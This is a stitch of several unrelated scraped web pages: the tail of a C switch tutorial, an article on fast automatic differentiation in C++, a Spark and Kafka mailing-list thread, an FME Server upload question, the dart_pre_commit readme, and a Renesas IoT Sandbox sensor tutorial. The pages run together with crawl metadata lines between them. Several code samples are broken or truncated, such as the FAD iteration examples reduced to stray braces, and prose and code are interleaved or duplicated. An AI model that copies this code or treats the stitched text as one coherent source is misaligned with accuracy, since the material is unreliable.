printf("Wednesday"); break; case 4 : printf("Thursday"); break; case 5 : printf("Friday"); break; case 6 : printf("Saturday"); break; case 7 : printf("Sunday"); break; default : printf("Invalid Number"); } return 0; } In the above program, the aim is to give the days of the week on the input of 1 to 7 and if the input is some other number then it will execute the default block. I hope, you all enjoyed a lot in this particular module and gained a lot of knowledge on the same, must be excited about the upcoming modules. Until then, keep practicing, enjoy the learning, Happy coding!
https://usemynotes.com/what-is-decision-making-statements-in-c/
CC-MAIN-2021-43
refinedweb
1,245
60.89
Fast automatic differentiation (FAD) is another way of computing the derivatives of a function in addition to the well-known symbolic and finite difference approaches. While not as popular as these two, FAD can complement them very well. It specializes on the differentiation of functions defined merely as fragments of code written in any programming language you prefer. Here I'd like to outline the benefits of this approach and describe my own implementation of FAD algorithms in C++. FAD can be helpful in embedding differentiation capabilities in your programs. You don't really need to know how it works to use it effectively. (Still you probably should know what differentiation is and how the derivatives of a function can be used.) This method really shines when you need to differentiate a function defined iteratively or recursively, or if the respective code fragment contains branches etc. There is an excellent article here on CodeProject on how to implement symbolic differentiation. It also contains some notational conventions and differentiation formulae for useful functions, so I won't repeat it all here. Here dy/dx denotes a derivative of y with respect to x (a partial derivative if y also depends on arguments other than x). dy/dx y x There are only two things you need to know to understand how the automatic differentiation works. Fortunately they are quite easy to understand. (Although, I repeat, they are not absolutely necessary to be able to use FAD.) The first one is the so called "chain rule" of differentiation. Suppose we have a composite function y(x) = f(g(x)) and g(x) and f(t) are differentiable at x == x0 and g(x0) respectively. Then y is also differentiable at x == x0 and its derivative is dy/dx = df/dt * dg/dx, where dg/dx is computed for x == x0, df/dt for t == g(x0). If in turn g() function is composite (for instance g(x) = h(k(x))) we can apply this rule repeatedly extending the "chain of derivatives" until we get to the functions that are not composite ("elementary functions"): dy/dx = df/dt * dh/du * dk/dx, where x == x0, t == g(x0), u == k(x0). Note that f(), h() and k() functions are "elementary" (like sin, cos, exp etc.), so we already know the exact formulae for their derivatives. y(x) = f(g(x)) g(x) f(t) x == x0 g(x0) dy/dx = df/dt * dg/dx dg/dx df/dt t == g(x0) g() g(x) = h(k(x)) dy/dx = df/dt * dh/du * dk/dx x == x0, t == g(x0), u == k(x0) f() h() k() sin cos exp This rule can be generalized for the functions of more than one argument. The formulae are slightly more complex in this case but the principle remains the same. Now recall that many of the computational processes operating on floating-point values are nothing more than an evaluation of some composite function. For a given set of input data the respective program executes a finite sequence of "elementary" operations like +, -, *, /, sin, cos, tan, exp, log etc. The conclusion is simple and straightforward. If we could process this sequence like a composite function we would be able to compute its derivatives, no matter how long it is. Fast automatic differentiation does exactly that. (See the [1] review for more details. There have been many publications on this subject in recent years. The ideas behind FAD are really not new.) +, -, *, /, sin, cos, tan, exp, log Several FAD algorithms require this sequence to be stored somehow for further processing, other algorithms don't. One of the most popular data structures to hold this sequence is a "computational graph" (the second thing that is important to understand FAD along with the chain rule described above). In a computational graph (CG) the nodes correspond to the elementary operations while the arcs connect these operations with their arguments. See the figure below for a sample CG for a function z(x) = f(g(h(x), k(x))). ("in" denotes any input operation.) z(x) = f(g(h(x), k(x))) If the code fragment contains branches, loops, recursion etc., CG may be different for different inputs. That's why the CG is not a control flow graph or an abstract syntax tree (AST) or the like. Automatic differentiation algorithms compute the derivatives of a function at the same point the function is evaluated in (unlike symbolic methods). Once the CG have been recorded one can traverse it either from the arguments to the functions of interest (from x to z in the example above, i.e. "forward") or in the opposite direction ("reverse") to compute the derivatives. Hence there are two main classes of FAD algorithms, namely "forward" and "reverse". z "Forward" FAD computes the derivative of every function with respect to one given argument in one CG traversal. (Although some forward algorithms don't require the CG to be actually stored.) "Reverse" FAD computes the whole gradient (derivatives with respect to every independent variable) of one given function in one traversal of the CG. This can be beneficial when dealing with a small number of functions of many arguments each. Such functions can arise, for example, in matrix manipulations etc. The "forward"-like FAD algorithm can also be used to estimate the inaccuracy of the function value accumulated during the computation. As you probably know, floating point values are often stored with the finite relative precision. For example, 1.0 and (1.0 + 1.0e-16) stored as double precision IEEE-compliant floating point numbers are usually considered the same. These "rounding errors can accumulate and lead to some uncertainty in the computed values. Rounding error estimation (REE) algorithms estimate these uncertainties (using the methods similar to the interval calculus). 1.0 1.0 + 1.0e-16 One common way to implement FAD algorithms in C++ is to use overloaded operators and functions for special "active variable" classes. (There are other ways, of course. Some of these other methods rely heavily on parsing, which is really beyond the scope of this article. One can find some information on these methods in [2].) Consider the following code fragment: double x0, y0; double x, y, f; // get x0 and y0 from somewhere (ask the user, for example) //... x = x0; // initialize the arguments (x and y) y = y0; f = sin(y * cos(x)); In order to employ FAD algorithms you need to change the types of the variables of interest (x, y and f) from double to CADouble ("active double") provided by a FAD library. You also need to mark the beginning and the end of an active code section (a fragment that defines the function to be differentiated along with the initialization of its arguments). Then you get the following: f double x0, y0; CADouble x, y, f; // instead of "double x, y, f;" CActiveSection as; // mark the beginning of the 'active section' as.begin(); // start recording operations in a computational graph (CG) x = x0; // initialize the arguments (x and y) y = y0; f = sin(y * cos(x)); as.end(); // stop recording, the active section ends These code fragments look quite similar, don't they? In both cases f(x, y) is calculated but in the second one the appropriate sequence of elementary operations (the CG) is also recorded. The CG can be used later to compute the derivatives of f(), like this: f(x, y) double out_x, out_y; // here the derivative values will be stored // compute df/dx partial derivative using forward mode FAD as.forward(x, f, out_x); // compute df/dy partial derivative using forward mode FAD as.forward(y, f, out_y); Useful operators and functions are overloaded for CADouble instances, so that these operations not only do what they are usually meant to but also record themselves in the CG. That's it. With a little change in your code you get the differentiation capabilities embedded in it. Of course, there is no free lunch. Using FAD can slow down execution of the affected code fragment by a factor of 2 to 400 (or even more, depending on the FAD algorithms you employ, your hardware etc.). Traversing a large CG involves a lot of memory access operations, which can be, of course, slower than simply performing a sequence of mathematical operations. Note that methods that do not require the CG to be actually stored (the so-called "fast forward" and "fast REE" algorithms) are usually faster and need less memory. The "Reed Library" I have written provides the following: ("Reed" is an acronym for "Rounding Error Estimation and Differentiation". It turned out that REE functionality was mandatory in my work while using FAD seemed to be optional. That's why REE is in the first place in this name. FAD was also very helpful to me more than once though.) Detailed reference of the classes and methods you can find in the provided Doxygen-generated documentation (see /reed/doc/reed library v01.chm). I'll mention only key points here. Most of the useful stuff in the library resides in namespace reed. Currently supported elementary operations are: namespace reed +, -, *, / +=, -=, *=, /= fmin(x, y) fmax(x, y) condAssign(x, y) == y 0 abs(x) sin(x), cos(x), tan(x) exp(x), log(x) sqrt(x) Several of the operations above are not everywhere differentiable (e.g. abs(x) has no derivative at x == 0). When evaluated at these points, some value will still be computed, the system won't crash but, of course, this value cannot be trusted. (Perhaps I'll make a flag or something like this to indicate this condition in future versions. Unfortunately I have no time for this now.) x == 0 Relational operations (==, >, < etc.) are also overloaded for CADouble and CADoubleF<...>. In CG-based methods they are used to detect whether CG structure must change for new values of the arguments. In "fast" methods they simply return the result of comparison of the respective floating point values. ==, >, < CADouble CADoubleF<...> Value of an active variable can be accessed via setValue() and getValue() methods. setValue() getValue() Instances of reed::CADouble class can be created both within and outside an active section. But (for efficiency reasons) you can assign something to them and use the overloaded operations for them within an active section only. Failure to do this will cause an assertion in debug mode and undefined behaviour in release. reed::CADouble To store CGs I chose to create a special memory allocator for fixed-size objects that is much faster than using the default new and delete. See reed/mem_pool.h. One can find information on building such allocators, for instance, in [3]. new delete All CG-based FAD algorithms are implemented as methods of reed::CActiveSection class. Among these are: int forward(CADouble arg, CADouble func, double& out); Computes the derivative of function func with respect to argument arg using forward mode FAD and return the result in out. Return value is insignificant for now. int reverse(CADouble arg, CADouble func, double& out); Does the same as above using reverse mode. int ree_lower(std::vector<CADouble>& arg, std::vector<double>& err); Computes the lower estimate of an error. By default the arguments are supposed to be stored with a machine accuracy (i.e. with relative precision about 1.1e-16 for an IEEE-compliant normalized double value.) You can override this by setting initial absolute error values for the variables in arg. These values are passed in err vector. After ree_lower() returns, you can retrieve the accumulated error value for any variable via CADouble::getAcc() method, e.g. double e = f.getAcc(). There are other overloaded versions of these methods that can be useful. See documentation and the examples provided with this article for details. reed::CActiveSection int forward(CADouble arg, CADouble func, double& out); func arg out int reverse(CADouble arg, CADouble func, double& out); int ree_lower(std::vector<CADouble>& arg, std::vector<double>& err); 1.1e-16 err ree_lower() CADouble::getAcc() double e = f.getAcc() To use these methods you should #include reed/adouble.h and reed/asection.h in your code and link your project with reed/lib/reed.lib library (or reed_d.lib for a debug version). See the provided examples ("simple", "iter" and "gradient"). #include "Fast" forward and REE algorithms are implemented in reed/adouble_f.h. You don't need any active sections or CG to use these. Nor do you need reed.lib. Just #include reed/adouble_f.h in your project, add util.cpp to it and you are all set. The "iter_f" example shows how you can use these "fast" algorithms. As I mentioned above, you can use FAD algorithms (both CG-based and "fast" versions) to differentiate iteratively defined functions, functions with branches etc. provided the functions are differentiable at the point of interest. Consider the following example (see "iter_f" project from the zip archive with the examples for a complete implementation). Suppose y = y(x) is defined like this: y = y(x) double x0 = ...; // set the argument value or ask the user for it size_t m = ...; // Number of iterations to perform. Let the user define it too. // Note: the value of m can be unknown at the compile-time. FAD will handle this. double x, y; x = x0; //argument; } } Need to compute dy/dx at x == x0? No problem. The resulting code fragment uses "fast" forward method, but you can use CG-based methods too. Change types as described above, set initial derivative value (dx/dx == 1.0) and you'll get dx/dx == 1.0 double x0 = ...; // set the argument value or ask the user for it size_t m = ...; // Number of iterations to perform. Let the user define it too. CADoubleFF x, y; // for REE use CADoubleRee instead. // Active sections are not necessary for "fast forward" and "fast REE" // algorithms because these algorithms do not require CG to be stored. x = x0; //argument x.setAcc(1.0); // Accumulated derivative is 1.0 in x (dx/dx). By default it is zero.; } } The value of the derivative dy/dx will be computed along with the y(x) at x == x0. Then you can retrieve these values via y.getAcc() and y.getValue(), respectively. Pretty easy, isn't it? y(x) y.getAcc() y.getValue() The "FADcpp_examples" Visual Studio solution contains 5 projects. It was tested under MS Visual C++ 7.1 only. (Perhaps it won't work under 6.0 or earlier due to some template tricks I used. I haven't tested it under 6.0 though.) "FADcpp_examples/reed" directory contains the "Reed Library" itself (code and documentation). You can rebuild the library using "reed_lib" project of this solution. Other 4 projects are the examples of using the library: f = sin(y * cos(x)) f(x) = (x * Ax) A x = (x0, x1, x2) This article is an outline of the so-called fast automatic differentiation (FAD). FAD can be of help when you need to embed differentiation capabilities in your program and/or to handle functions with branches, loops recursion etc. This way automatic differentiation can complement symbolic differentiation. The latter is mostly used when we have a formula ("closed expression") for a function to be differentiated. If we don't, FAD can often help. Hope my implementation of the fast automatic differentiation and rounding error estimation algorithms will prove useful to you. Give it a try! Any feedback will.
http://www.codeproject.com/Articles/15432/Fast-Automatic-Differentiation-in-C?fid=337310&df=10000&mpp=10&noise=1&prof=True&sort=Position&view=None&spc=Relaxed
CC-MAIN-2016-30
refinedweb
2,573
56.96
Histograms - 2: Histogram Equalization Histograms Equalization cv2.equalizeHist() CLAHE (Contrast Limited Adaptive Histogram Equalization) So to solve this problem, adaptive histogram equalization is used. In this, image is divided into small blocks called “tiles” (tileSize is 8x8 by default in OpenCV). Then each of these blocks are histogram equalized as usual. So in a small area, histogram would confine to a small region (unless there is noise). If noise is there, it will be amplified. To avoid this, contrast limiting is applied. If any histogram bin is above the specified contrast limit (by default 40 in OpenCV), those pixels are clipped and distributed uniformly to other bins before applying histogram equalization. After equalization, to remove artifacts in tile borders, bilinear interpolation is applied. import numpy as np import cv2 img = cv2.imread('tsukuba_l.png',0) # create a CLAHE object (Arguments are optional). clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8)) cl1 = clahe.apply(img) cv2.imwrite('clahe_2.jpg',cl1) Python+OpenCV学习(2)---图像的合并与拆分 OpenCV图像增强算法实现(直方图均衡化、拉普拉斯、Log、Gamma)
http://www.voidcn.com/article/p-pjjjareo-bro.html
CC-MAIN-2018-09
refinedweb
169
51.65
Have a look at this guide here: You should be able to send your sensor data to a Kafka topic, which Spark will subscribe to. You may need to use an Input DStream to connect Kafka to Spark. Taylor -----Original Message----- From: zakhavan <zakhavan@unm.edu> Sent: Tuesday, October 2, 2018 1:16 PM To: user@spark.apache.org Subject: RE: How to do sliding window operation on RDDs in Pyspark? Thank you, Taylor for your reply. The second solution doesn't work for my case since my text files are getting updated every second. Actually, my input data is live such that I'm getting 2 streams of data from 2 seismic sensors and then I write them into 2 text files for simplicity and this is being done in real-time and text files get updated. But it seems I need to change my data collection method and store it as 2 DStreams. I know Kafka will work but I don't know how to do that because I will need to implement a custom Kafka consumer to consume the incoming data from the sensors and produce them as DStreams. The following code is how I'm getting the data and write them into 2 text files. Do you have any idea how I can use Kafka in this case so that I have DStreams instead of RDDs? from obspy.clients.seedlink.easyseedlink import create_client from obspy import read import numpy as np import obspy from obspy import UTCDateTime def handle_data(trace): print('Received new data:') print(trace) print() if trace.stats.network == "IU": trace.write("/home/zeinab/data1.mseed") st1 = obspy.read("/home/zeinab/data1.mseed") for i, el1 in enumerate(st1): f = open("%s_%d" % ("out_file1.txt", i), "a") f1 = open("%s_%d" % ("timestamp_file1.txt", i), "a") np.savetxt(f, el1.data, fmt="%f") np.savetxt(f1, el1.times("utcdatetime"), fmt="%s") f.close() f1.close() if trace.stats.network == "CU": trace.write("/home/zeinab/data2.mseed") st2 = obspy.read("/home/zeinab/data2.mseed") for j, el2 in enumerate(st2): ff = open("%s_%d" % ("out_file2.txt", j), "a") ff1 = open("%s_%d" % ("timestamp_file2.txt", j), "a") np.savetxt(ff, el2.data, fmt="%f") np.savetxt(ff1, el2.times("utcdatetime"), fmt="%s") ff.close() ff1.close() client = create_client('rtserve.iris.washington.edu:18000', handle_data) client.select_stream('IU', 'ANMO', 'BHZ') client.select_stream('CU', 'ANWB', 'BHZ') client.run() Thank you, Zeinab -- Sent from: --------------------------------------------------------------------- To unsubscribe e-mail: user-unsubscribe@spark.apache.org --------------------------------------------------------------------- To unsubscribe e-mail: user-unsubscribe@spark.apache.org
http://mail-archives.us.apache.org/mod_mbox/spark-user/201810.mbox/%3CSN6PR2101MB0894947F82F069DDD48D0D2886E80@SN6PR2101MB0894.namprd21.prod.outlook.com%3E
CC-MAIN-2019-35
refinedweb
422
61.73
§What’s new in Play 2.3 This page highlights the new features of Play 2.3. If you want learn about the changes you need to make to migrate to Play 2.3, check out the Play 2.3 Migration Guide. §Activator The first thing you’ll notice about Play 2.3 is that the play command has become the activator command. Play has been updated to use Activator so that we can: - Extend the range of templates we provide for getting started with Play projects. Activator supports a much richer library of project templates. Templates can also include tutorials and other resources for getting started. The Play community can contribute templates too. - Provide a nice web UI for getting started with Play, especially for newcomers who are unfamiliar with command line interfaces. Users can write code and run tests through the web UI. For experienced users, the command line interface is available just like before. - Make Play’s high productivity development approach available to other projects. Activator isn’t just for Play. Other projects can use Activator too. In the future Activator will get even more features, and these features will automatically benefit Play and other projects that use Activator. Activator is open source, so the community can contribute to its evolution. improvements. §Auto Plugins Play now uses sbt 0.13.5. This version brings a new feature named “auto plugins” which, in essence permits a large reduction in settings-oriented code for your build files. §Asset Pipeline and Fingerprinting sbt-web brings the notion of a highly configurable asset pipeline to Play e.g.:. One new capability for Play 2.3 is the support for asset fingerprinting, similar in principle to Rails asset fingerprinting. A consequence of asset fingerprinting is that we now use far-future cache expiries when they are served. The net result of this is that your user’s will experience faster downloads when they visit your site given the aggressive caching strategy that a browser is now able to employ. §Default ivy cache and local repository Play now uses the default ivy cache and repository, in the .ivy2 folder in the users home directory. This means Play will now integrate better with other sbt builds, not requiring artifacts to be cached multiple times, and allowing the sharing of locally published artifacts. §Java improvements §Java 8 Play 2.3 has been tested with Java 8. Your project will work just fine with Java 8; there is nothing special to do other than ensuring that your Java environment is configured for Java 8. There is a new Activator sample available for Java 8: Our documentation has been improved with Java examples in general and, where applicable, Java 8 examples. Check out some examples of asynchronous programming with Java 8. For a complete overview of going Reactive with Java 8 and Play check out this blog: §Java performance We’ve worked on Java performance. Compared to Play 2.2, throughput of simple Java actions has increased by 40-90%. Here are the main optimizations: - Reducing thread switches for Java actions and body parsers. - Caching more route information and using per-route caching rather than a shared Map. - Reducing body parsing overhead for GET requests. - Using a unicast enumerator for returning chunked responses. Some of these changes also improved Scala performance, but Java had the biggest performance gains and was the main focus of our work. Thankyou to YourKit for supplying the Play team with licenses to make this work possible. §Scala 2.11 Play 2.3 is the first release of Play to have been cross built against multiple versions of Scala, both 2.10 and 2.11. You can select which version of Scala you would like to use by setting the scalaVersion setting in your build.sbt or Build.scala file. For Scala 2.11: scalaVersion := "2.11.1" For Scala 2.10: scalaVersion := "2.10.4" §Play WS §Separate library The WS client library has been refactored into its own library which can be used outside of Play. You can now have multiple WSClient objects, rather than only using the WS singleton. Java WSClient client = new NingWSClient(config); Promise<WSResponse> response = client.url("").get(); Scala val client: WSClient = new NingWSClient(config) val response = client.url("").get() Each WS client can be configured with its own options. This allows different Web Services to have different settings for timeouts, redirects and security options. The underlying AsyncHttpClient object can also now be accessed, which means that multi-part form and streaming body uploads are supported. §WS Security WS clients have settings for comprehensive SSL/TLS configuration. WS client configuration is now more secure by default. §Actor WebSockets A method to use actors for handling websocket interactions has been incorporated for both Java and Scala e.g. using Scala: Java public static WebSocket<String> socket() { return WebSocket.withActor(MyWebSocketActor::props); } Scala def webSocket = WebSocket.acceptWithActor[JsValue, JsValue] { req => out => MyWebSocketActor.props(out) §Results restructuring completed In Play 2.2, a number of new result types were introduced and old results types deprecated. Play 2.3 finishes this restructuring. See Results restructure in the Migration Guide for more information. §Anorm There are various fixes included in Play 2.3’s Anorm (type safety, option parsing, error handling, …) and new interesting features. - String interpolation is available to write SQL statements more easily, with less verbosity (passing arguments) and performance improvements (up to x7 faster processing parameters). e.g. SQL"SELECT * FROM table WHERE id = $id" - Multi-value (sequence/list) can be passed as parameter. e.g. SQL"""SELECT * FROM Test WHERE cat IN (${Seq("a", "b", "c")})""" - It’s now possible to parse column by position. e.g. val parser = long(1) ~ str(2) map { case l ~ s => ??? } - Query results include not only data, but execution context (with SQL warning). - More types are supported as parameter and as column: java.util.UUID, numeric types (Java/Scala big decimal and integer, more column conversions between numerics), temporal types ( java.sql.Timestamp), character types. §Custom SSLEngine for HTTPS The Play server can now use a custom `SSLEngine`. This is also useful in cases where customization is required, such as in the case of client authentication. Next: Migration Guide Found an error in this documentation? The source code for this page can be found here. After reading the documentation guidelines, please feel free to contribute a pull request.
https://www.playframework.com/documentation/2.5.x/Highlights23
CC-MAIN-2017-04
refinedweb
1,066
59.5
Hi there! Have come across a somewhat unusual(?) problem regarding include paths. Hopefully some of you guys have a way to get around it. Here it is: In a project that I'm involved in some people decided to to use a complete unix path for include files.... Like this: #ifndef SOME_FILE__ #define SOME_FILE__ #include "/clearcase_rootdir/some_vob/subdir1/subdir2/subdir3/someFile.h" #endif The problem here is that I'am on a Windows XP computer and there is no access to this path under windows. The closest one can get is to map a drive letter to the M:\some_clearcase_view\ (the clearcase root in windows) but that would take me to the /subdir1/ level of the above path and not the "/clearcase_rootdir" that I want to get hold of... Has anyone got any suggestions in how to solve the issue? Anything goes here. Been thinking about if there are som preprocessor directive that states something like "#ignore path" to include-files and just uses the filename and the std paths specified in the environment and makefile .. Regards
http://cboard.cprogramming.com/cplusplus-programming/109499-ignore-paths-printable-thread.html
CC-MAIN-2015-48
refinedweb
177
71.44
span8 span4 span8 span4 I want to upload some files for a specific workbench using HTTP. I'm using Python for this with requests library, but I'm having difficulty getting it to work. My python code is as follows: with open(file_path, 'rb') as file: url = f"{fme_url}/fmedataupload/{script_location}" data = { 'custom_file': { 'value': file.read(), 'options': { 'contentType': 'application/octet-stream', 'filename': file_name, } }, 'opt_namespace': directory, 'opt_fullpath': True } token = get_token() headers = { 'content-type': 'application/x-www-form-urlencoded', 'Authorization': f"fmetoken token={token}", } return requests.post(url, data=data, headers=headers, json=True) I do get a 200 OK response, so authorization is fine, but the file isn't uploaded. It even creates a directory at the right spot. The response is as follows <Response [200]> {"serviceResponse": { "statusInfo": {"status": "success"}, "session": "foo", "files": { "path": "", "folder": [{ "path": "$(FME_DATA_REPOSITORY)/main_repository/script_name.fmw/foo", "name": "" }] } }} The data upload documentation () simply lists 'Upload a single file or multiple files using a simple form submission that uses HTTP POST.', which is not helpful. I'm using Python 3.8 and FME server 2019.2 My goal is to upload the required files, then start a workbench, and finally retrieve the result, all using Python. Preferably, the FME server account that Python uses has as little permissions as possible. @arjanboogaart, Can you confirm the version of FME Server you are using here? Python 3? It could be an issue we need to look at for sure. Thanks for posting! Python 3.8 and FME server 2019.2. I have a suspicion it has to do with how python requests sends the form data, as we have a similar setup in Node.js which is working. It's strange how it sends a 200 OK response, I would expect a 400 if there's something wrong with my request. @arjanboogaart, I suspect you are not using python3.8 with FME... it won't work as we've not added support for that yet. Here's the export. UploadExamplePostman.json.zip Let us know if this helps. I got curious about your mention that the file was NOT being uploaded so I did go test this in Postman and used the POST. In my testing, using FME Server 2019.2, I can confirm a file is uploaded and a folder is created. Are you looking in the /system/temp/upload location? Does the token you are using have enough permissions (I would expect an error if so - so this is likely not your problem) Because the files are being uploaded by the Data Upload Service, they are volatile (non-persistent) you will find them in the FME Server temp file location. That location is determined in the service properties file. By default: # UPLOAD_DIR UPLOAD_DIR=<System share>/resources/system/temp/upload Do you mind sharing the postman request? I believe there is an 'export' option. That might help me recreate it in Python This example uses HTTP PUT instead of POST. PUT doesn't support custom directory names. Hi @arjanboogaart, So you want to upload some files for a particular workspace... are they to persist? I'm not sure if this is going to help you but you could try the FME Server API for uploading a resource for a workspace and then delete the resource at some time later when no longer needed. I can only share this as guidance and unfortunately, I've not attempted to port it to python... but you could likely have some success. From Postman POST the resource or file: DELETE the resource or file: @arjanboogaart Have you tried FMEServerResourceConnector or HTTPCaller? My question is about using the FME server rest API in python. This is not from inside an FME workbench, but as a standalone python application. Answers Answers and Comments 25 People are following this question.
https://knowledge.safe.com/questions/109808/uploading-files-using-python-via-data-upload-servi.html
CC-MAIN-2020-16
refinedweb
634
66.54
Microsoft split ADO.NET into two camps: the SqlClient camp and the OleDb camp. The SqlClient camp represents Microsoft SQL Server 7.0 and higher, and the OleDb camp handles everything else, including Microsoft ACCESS, Microsoft SQL Server 6.5, Oracle, UDB, Sybase, Informix, and others. The notion of a camp refers to database providers. In addition to the two-camp model, Microsoft's .NET Framework supports extending ADO.NET by allowing vendors to implement their own provider classes. The result is that any database supplier could create its own custom provider classes for ADO.NET. ADO.NET in general is made up of the System.Data and System.Xml namespaces. Classes that are general to ADO.NET are typically found in the System.Data namespace. For example, DataSet , a general class shared between providers, is defined in System.Data . Classes that are specific to a provider camp can be found in System.Data.OleDb or System.Data.SqlClient . For classes in either camp to work with the general DataSet class, each camp must support the same basic capabilities. For example, to get data into a DataSet class you need a connection. There is a connection class in the OleDb namespace as well as one in the SqlClient namespace. These namespace-specific classes employ a prefix naming convention: OleDb classes are prefixed with OleDb , and SqlClient classes are prefixed with Sql . Thus the OleDb connection class is suitably named OleDbConnection ; the SqlClient connection class, SqlConnection . For the most part both the OleDb and SqlClient connection classes implement the same members and operations. As a result of the similarities in OleDb and SqlClient classes, if you learn to use one or the other, you can easily use its alternative provider counterpart . Two other important namespaces related to System.Data are System.Data.Common and System.Data.SqlTypes . The Common namespace defines classes for permissions, table column mappings, and some event argument types. The SqlTypes namespace defines native types for SQL Server. As a general rule, you will most often use the System.Data and System.Xml namespaces and one or the other of the provider namespaces, OleDb or SqlClient . I will be using the OleDb providers in this chapter because I can reasonably gamble on your having a copy (or being able to get one) of the Northwind database. For informational purposes, it is worth noting that most of the code in this chapter could easily be substituted for classes in the SqlClient namespace, if you are using a newer version of Microsoft SQL Server. However, the OleDb classes represent the classes you will use for the greatest diversity of database providers.
https://flylib.com/books/en/1.489.1.118/1/
CC-MAIN-2021-25
refinedweb
441
59.4
dart_pre_commit A small collection of pre commit hooks to format and lint dart code Features - Provides three built in hooks to run on staged files - Fix up imports (package/relative) and sort them - Run dart format - Run dart analyze - Only processes staged files - Automatically stages modified files again - Fails if partially staged files had to be modified - Can be used as binary or as library - Integrates well with most git hook solutions Installation Simply add dart_pre_commit to your pubspec.yaml (preferebly as dev_depedency) and run dart pub get (or flutter pub get). Usage To make use of the hooks, you have to activate them first. This package only comes with the hook-code itself, not with a way to integrate it with git as actual hook. Here are a few examples on how to do so: Using git_hooks The first example uses the git_hooks package to activate the hook. Take the following steps to activate the hook: - Add git_hooksas dev_dependency to your project - Run dart pub run git_hooks createto initialize and activate git hooks for your project - Modify git_hooks.dartto look like the following: import "dart:io"; import "package:dart_pre_commit/dart_pre_commit.dart"; import "package:git_hooks/git_hooks.dart"; void main(List<String> arguments) { final params = { Git.preCommit: _preCommit }; change(arguments, params); } Future<bool> _preCommit() async { hooks = await Hooks.create(); // adjust behaviour if neccessary final result = await hooks(); // run activated hooks on staged files return result.isSuccess; // report the result } Using hanzo The second example uses the hanzo package to activate the hook. Take the following steps to activate the hook: - Add hanzoas dev_dependency to your project - Run dart pub run hanzo installto initialize and activate git hooks for your project - Create a file named ./tool/pre_commit.dartas follows: import "package:dart_pre_commit/dart_pre_commit.dart"; void main() { hooks = await Hooks.create(); // adjust behaviour if neccessary final result = await hooks(); // run activated hooks on staged files exitCode = result.isSuccess ? 0 : 1; // report the result } - Run dart pub run hanzo -i pre_commit Without any 3rd party tools The package also provides a script to run the hooks. You can check it out via dart pub run dart_pre_commit --help. To use it as git hook, without any other tool, you have to create a script called pre-commit in .git/hooks as follows: #!/bin/bash exec dart pub run dart_pre_commit # Add extra options as needed Documentation The documentation is available at. A full example can be found at.
https://pub.dev/documentation/dart_pre_commit/latest/
CC-MAIN-2021-25
refinedweb
402
54.22
public class JobFlowDetail The version of the AMI used to initialize Amazon EC2 instances in the job flow. For a list of AMI versions currently supported by Amazon ElasticMapReduce, go to AMI Versions Supported in Elastic MapReduce in the Amazon Elastic MapReduce Developer's Guide. A list of the bootstrap actions run by the job flow. Describes the execution status of the job flow. Describes the Amazon EC2 instances of the job flow. The job flow identifier. The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role. The location in Amazon S3 where log files for the job are stored. The name of the job flow. The IAM role that was specified when the job flow was launched. Amazon ElasticMapReduce will assume this role to work with AWS resources on your behalf. A list of steps run by the job flow. A list of strings set by third party software when the job flow is launched. If you are not using third party software to manage the job flow this value is empty. Specifies whether the job flow is visible to all IAM users of the AWS account associated with the job flow. If this value is set to CopyC#true, all IAM users of that AWS account can view and (if they have the proper policy permissions set) manage the job flow. If it is set to CopyC#false, only the IAM user that created the job flow can view and manage it. This value can be changed using the SetVisibleToAllUsers action. true false
https://docs.aws.amazon.com/sdkfornet1/latest/apidocs/html/T_Amazon_ElasticMapReduce_Model_JobFlowDetail.htm
CC-MAIN-2022-05
refinedweb
267
74.29
:* Location Detection Guide], }) Click on Dashboard on the left side of the Renesas IoT Sandbox and reset your board. In the Real Time Events Log widget, you should see an event containing a processed air quality value after approximately 5 minutes. In this step, you will set up a workflow to receive the temperature and humidity information from the board.Set up the following workflow: Set the Custom trigger minutely interval to 2 and select All Users, as you did in Step 2.Replace the Base Python code with the following: import MQTT ENS210_ADDR = 0x43 mqtt_buffer = u'' def write_register(reg, data): global mqtt_buffer mqtt_buffer += u'3;2;0;3;unused;' + u''.join(map(unichr, [ENS210_ADDR, reg, data])) def read_register(reg, num, tag_name): global mqtt_buffer mqtt_buffer += u'3;2;{};2;{};'.format(num, tag_name) + u''.join(map(unichr, [ENS210_ADDR, reg])) write_register(0x21, 0x03) MQTT.publish_event_to_client('s3a7', mqtt_buffer, 'latin1') mqtt_buffer = u'' write_register(0x22, 0x03) MQTT.publish_event_to_client('s3a7', mqtt_buffer, 'latin1') mqtt_buffer = u'' read_register(0x30, 6, 'temp_and_humidity') MQTT.publish_event_to_client('s3a7', mqtt_buffer, 'latin1') Then click "Save and Activate". Click on Dashboard on the left side of the Renesas IoT Sandbox and reset your board. In the Real Time Events Log widget, you should see an event containing temperature and humidity data within 2 minutes. In this step, you will set up a workflow to process the temperature and humidity information and format it into JSON.Set up the following workflow:)) # The crc7(val) function returns the CRC-7 of a 17 bits value val. # Compute the CRC-7 of 'val' (should only have 17 bits) def crc7(val): # Setup polynomial pol = CRC7POLY # Align polynomial with data pol = pol << (DATA7WIDTH-CRC7WIDTH-1) # Loop variable (indicates which bit to test, start with highest) bit = DATA7MSB; # Make room for CRC value val = val << CRC7WIDTH bit = bit << CRC7WIDTH pol = pol << CRC7WIDTH # Insert initial vector val |= CRC7IVEC # Apply division until all bits done while( bit & (DATA7MASK<<CRC7WIDTH) ): if( bit & val ): val ^= pol bit >>= 1 pol >>= 1 return val handt = IONode.get_input('in1')['event_data']['value'] out = {} t_val = handt[0] | (handt[1] << 8) | (handt[2] << 16) h_val = handt[3] | (handt[4] << 8) | (handt[5] << 16) t_data = t_val & 0xffff; t_valid = (t_val >> 16) & 0x1; t_crc = (t_val >> 17) & 0x7f; h_data = h_val & 0xffff; h_valid = (h_val >> 16) & 0x1; h_crc = (h_val >> 17) & 0x7f; print "t_data: {}, t_valid: {}, t_crc: {}, h_data: {}, h_valid: {}, h_crc: {}".format(t_data, t_valid, t_crc, h_data, h_valid, h_crc) if t_valid: t_payl = t_val & 0x1ffff; calc_t_crc = crc7(t_payl) if calc_t_crc == t_crc: out['temperature'] = round(float(t_data) / 64 - 273.15”. Click on Dashboard on the left side of the Renesas IoT Sandbox and reset your board. In the Real Time Events Log widget, you should see an event containing temperature and humidity after approximately 5 minutes. In this step, you will set up a workflow to send your location, temperature, humidity, and air quality data to the Learn IoT Community World Map.Set up the following workflow:”. Click on Dashboard on the left side of the Renesas IoT Sandbox, open the Learn IoT Community World Map, and reset your board. In the Real Time Events Log widget, you should see an event containing all of your sent data in approximately 5 minutes. Congrats, you've just learned how to send your board data to our IoT Community World Map. You have now finished this tutorial sequence, 